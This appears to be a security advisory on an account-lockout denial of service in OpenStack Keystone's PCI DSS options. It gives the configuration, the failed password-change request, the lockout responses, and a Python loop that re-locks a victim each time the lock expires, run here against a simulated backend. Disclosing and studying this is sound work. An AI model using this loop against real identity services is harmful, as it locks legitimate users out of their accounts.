This relates to PCI DSS features added in the Newton release.
keystone.conf:
[security_compliance]
# Setting the account lockout threshold
lockout_failure_attempts = 2
lockout_duration = 10
Try to change a user's password on their behalf:
POST /v3/users/<user_id>/password
{
"user": {
"original_password": "fake_password",
"password": "new_password"
}
}
Because the original password is wrong (the attacker does not know it), after lockout_failure_attempts such attempts the user account is locked out for lockout_duration seconds.
Before lockout_failure_attempts attempts, you get:
{
"error": {
"code": 401,
"title": "Unauthorized",
"message": "The request you have made requires authentication."
}
}
After lockout_failure_attempts attempts, you get:
{
"error": {
"code": 401,
"title": "Unauthorized",
"message": "The account is locked for user: 94ab353983174b04955fc9842779b085."
}
}
An attacker who knows user IDs can use this to lock users out indefinitely, by repeating the failed password-change requests each time lockout_duration has passed, so the account is re-locked before its owner can use it.
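The following Python is an added illustration, not part of the original advisory and not Keystone's code. It models the lockout rules above (threshold 2, duration 10 seconds) in a constructed in-memory stand-in, FakeKeystone, which only reproduces the two 401 responses quoted on this page; the user ID is the one from those responses, the victim's real password and the rule that the failure counter restarts when a lock is set are assumptions of the model. It then runs the attacker's loop against that model under a virtual clock and shows that the legitimate owner, presenting the correct original_password, is still refused. The send callable can be anything that returns (status, json), so the same loop could issue the POST shown above against a real endpoint.

```python
"""Simulation of the lockout denial of service described above.

Added example, not Keystone's code: FakeKeystone only reproduces the two
responses quoted on this page and the lockout_failure_attempts /
lockout_duration rules, with constructed user data.
"""
LOCKOUT_FAILURE_ATTEMPTS = 2   # [security_compliance] lockout_failure_attempts
LOCKOUT_DURATION = 10          # [security_compliance] lockout_duration (seconds)
VICTIM = "94ab353983174b04955fc9842779b085"   # user id quoted in the responses


def error_body(message):
    return {"error": {"code": 401, "title": "Unauthorized", "message": message}}


def password_change_body(original_password, new_password):
    """Body of POST /v3/users/<user_id>/password, as shown on this page."""
    return {"user": {"original_password": original_password,
                     "password": new_password}}


def classify(status, body):
    """Map a (status, json) response to 'ok', 'locked' or 'auth_failed'."""
    if 200 <= status < 300:
        return "ok"
    message = body.get("error", {}).get("message", "")
    return "locked" if message.startswith("The account is locked") else "auth_failed"


class FakeClock:
    """Virtual time, so waiting out lockout_duration costs nothing."""
    now = 0.0
    def __call__(self): return self.now
    def sleep(self, seconds): self.now += seconds


class FakeKeystone:
    """Constructed stand-in for an identity backend with PCI-DSS lockout on.
    Assumption: the failure counter restarts when a lock is set, so every
    fresh lock costs the attacker lockout_failure_attempts requests again."""
    def __init__(self, clock, attempts=LOCKOUT_FAILURE_ATTEMPTS,
                 duration=LOCKOUT_DURATION):
        self.clock, self.attempts, self.duration = clock, attempts, duration
        self.passwords = {VICTIM: "victims-real-password"}  # constructed
        self.failures = {}   # user_id -> consecutive wrong original_password
        self.locked_at = {}  # user_id -> virtual time the lock began

    def is_locked(self, user_id):
        started = self.locked_at.get(user_id)
        return started is not None and self.clock() - started < self.duration

    def change_password(self, user_id, body):
        """Same outcomes as the two 401 responses quoted above."""
        if self.is_locked(user_id):
            return 401, error_body("The account is locked for user: %s." % user_id)
        creds = body["user"]
        if creds["original_password"] == self.passwords.get(user_id):
            self.passwords[user_id] = creds["password"]
            self.failures[user_id] = 0
            return 204, {}
        self.failures[user_id] = self.failures.get(user_id, 0) + 1
        if self.failures[user_id] >= self.attempts:   # threshold reached: lock
            self.locked_at[user_id] = self.clock()
            self.failures[user_id] = 0
        return 401, error_body("The request you have made requires authentication.")


def sustain_lockout(send, sleep, user_id, rounds):
    """Attacker loop: lock user_id, wait lockout_duration, lock it again.
    send(user_id, body) -> (status, json). Returns how many locks were confirmed
    by the 'account is locked' message; a round is abandoned after threshold + 2
    tries without it, which is what an unconfigured lockout looks like."""
    body = password_change_body("fake_password", "new_password")
    confirmed = 0
    for rnd in range(rounds):
        if rnd:
            sleep(LOCKOUT_DURATION)   # previous lock has just expired
        for _ in range(LOCKOUT_FAILURE_ATTEMPTS + 2):
            if classify(*send(user_id, body)) == "locked":
                confirmed += 1
                break
        else:
            return confirmed
    return confirmed


def demo(rounds=3):
    """Attack the simulation; returns (locks confirmed, owner's outcome)."""
    clock = FakeClock()
    ks = FakeKeystone(clock)
    locks = sustain_lockout(ks.change_password, clock.sleep, VICTIM, rounds)
    # the real owner, sending the correct original_password, is still refused
    owner = classify(*ks.change_password(
        VICTIM, password_change_body("victims-real-password", "new-one")))
    return locks, owner
```

demo() returns (3, 'locked'): three consecutive locks were confirmed and the owner is shut out at the end. With a FakeKeystone whose threshold is never reached (the unconfigured case) sustain_lockout() returns 0 and the owner's password change succeeds, which is the trade-off the lockout options introduce.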